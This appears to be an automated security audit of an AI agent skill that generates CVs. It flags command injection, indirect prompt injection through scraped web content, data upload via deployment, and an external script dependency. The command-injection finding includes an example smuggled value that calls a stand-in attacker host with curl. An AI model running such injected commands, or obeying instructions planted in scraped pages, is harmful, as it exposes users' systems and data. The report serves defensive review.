
cv-generator

Warn

Audited by Gen Agent Trust Hub on Mar 25, 2026

Risk Level: MEDIUM
Categories: COMMAND_EXECUTION, PROMPT_INJECTION, DATA_EXFILTRATION, EXTERNAL_DOWNLOADS
Full Analysis
  • [COMMAND_EXECUTION]: The skill uses shell commands to process user files and generate images. Specifically, it calls textutil -convert txt <file> -stdout and infsh app run ... --input '{"image_url": "[path-to-user-photo]"}'. These commands interpolate user-controlled file paths directly into the shell string. Without rigorous sanitization by the agent, this pattern is vulnerable to command injection if an attacker provides a maliciously crafted file path (e.g., resume.pdf; curl http://attacker.com).
  • [PROMPT_INJECTION]: The skill is vulnerable to indirect prompt injection because it ingests untrusted data from external sources (LinkedIn, company websites, job postings) via FirecrawlScrapeTool and PerplexitySonarSearchTool. This data is then processed to inform the agent's strategy and content generation.
    • Ingestion points: External data is fetched from URLs and user-uploaded documents (PDF, DOCX, Notion).
    • Boundary markers: The instructions do not specify any delimiters or safety markers to isolate external data from the system prompt.
    • Capability inventory: The skill has significant capabilities, including shell execution (bash), file system writes, and network deployment tools (wrangler).
    • Sanitization: There are no mentioned sanitization or validation steps for the scraped content before it is processed by the LLM.
  • [DATA_EXFILTRATION]: The skill is designed to deploy the user's extracted personal and professional information to Cloudflare Workers via wrangler deploy. While Cloudflare is a well-known service, this involves the automated transfer of potentially sensitive user data (contact details, work history) to a third-party hosting environment.
  • [EXTERNAL_DOWNLOADS]: The generated resume includes an external script dependency: html2pdf.js hosted on cdnjs.cloudflare.com. While the source is a well-known CDN, generating local HTML files that include and execute external JavaScript is a notable security surface.
Audit Metadata
Risk Level
MEDIUM
Analyzed
Mar 25, 2026, 09:01 PM